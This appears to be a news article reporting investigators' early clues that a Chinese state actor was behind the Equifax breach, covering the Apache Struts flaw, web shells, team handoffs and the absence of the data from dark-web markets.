Early clues have emerged that suggest a state actor was behind the massive hack of Equifax earlier this month, with China suggested as a prime suspect.
The startling new details from the investigation into the data breach affecting 142million Americans’ personal data came in a Bloomberg report on Friday citing more than a dozen people familiar with the probe.
Evidence against China includes the use of multiple sub-specialized hacking teams and hacking tools known to have Chinese interfaces, though experts caution the identity of the perpetrator is far from certain.
Unlike the criminal hacking groups loosely affiliated with the Russian government, China is known to have highly organized People Liberation Army units dedicated to hacking foreign governments and companies.
Those units are believed to be behind numerous previous attacks targeting intellectual property, as well as personal data and medical data that could offer leverage on an intelligence source.
China is known to have highly organized People Liberation Army units dedicated to hacking foreign governments and companies. PLA soldiers are seen in this file photo
New details emerge in the investigation into the Equifax data breach. Some investigators are convinced that China was behind the attack, but that has not yet been proven
The fateful events at Equifax began to unfold on March 6, when Apache published a fix for a known vulnerability in Apache Struts, its popular back-end software for web applications.
Hackers of all kinds watch carefully for new vulnerability fixes, because they expose flaws in the software that can be exploited in any version that hasn’t yet been updated.
The Struts vulnerability appeared on Chinese security forum FreeBuf.com within 24 hours of its release.
Days later, on March 10, hackers probing the internet for vulnerable systems got a hit at Equifax, and made their initial breach, sources told Bloomberg.
The hackers quickly began establishing back doors into the system, allowing them to regain access if the initial vulnerability was patched.
Eventually they created some 30 web shells serving as redundant back doors, a technique known to be favored by the Chinese.
One of the web shells used was China Chopper, which is widely used by Chinese hackers but also by other groups.
Using traffic data recovered after the hack was finally discovered on July 29, investigators found that the team that initially breached Equifax struggled to evade the company’s internal firewalls, but quickly handed off the job to a much more skilled team.
The second team used special tunneling tools to maneuver around firewalls, analyzing and cracking one database after the next, and creating their own map of where the most valuable data was stored.
That level of specialization is indicative of a large organization with a hierarchy of teams, like the Chinese military.
Eventually, the investigators found, the hackers began searching for data on specific individuals – a tactic that could either indicate a desire to leverage potential intelligence sources or find wealthy people to defraud.
But the criminal hackers who steal credit card data for profit are rarely the ones who use that data to commit fraud.
Instead, specialized infiltration hackers typically obtain as much personal and payment data as possible, and then sell it along in batches to other criminals through Dark Web marketplaces.
The stolen data on 143million Americans has yet to appear on Dark Web criminal marketplaces, suggesting that it is in the hands of a state intelligence agency
Alarmingly, investigators say that none of the data stolen in the Equifax breach has appeared for sale on those marketplaces – alarming because that means it is almost certainly in the hands of a state intelligence apparatus, rather than profit-motivated criminals.
‘This wasn’t a credit card play,’ one investigator told Bloomberg. ‘This was a “get as much data as you can on every American” play.’
Searching for clues, on September 11 the FBI asked major banks to monitor small batches of credit card accounts for suspicious activity – in one case the accounts of just 20 people.
Investigators hope that any fraudulent activity on the accounts could give clues as to the breach perpetrators. It is unknown whether the accounts were those of people whom the hackers specifically sought information on.
In the meantime, no mass cancellation of credit cards has been issued, as typically happens when account information is known to be circulating among criminals.
A federal investigation and internal company probe into the breach are both ongoing.
Whether China or another state actor was behind the history-making attack on Americans’ data will likely remain uncertain at least until investigators conclude their efforts.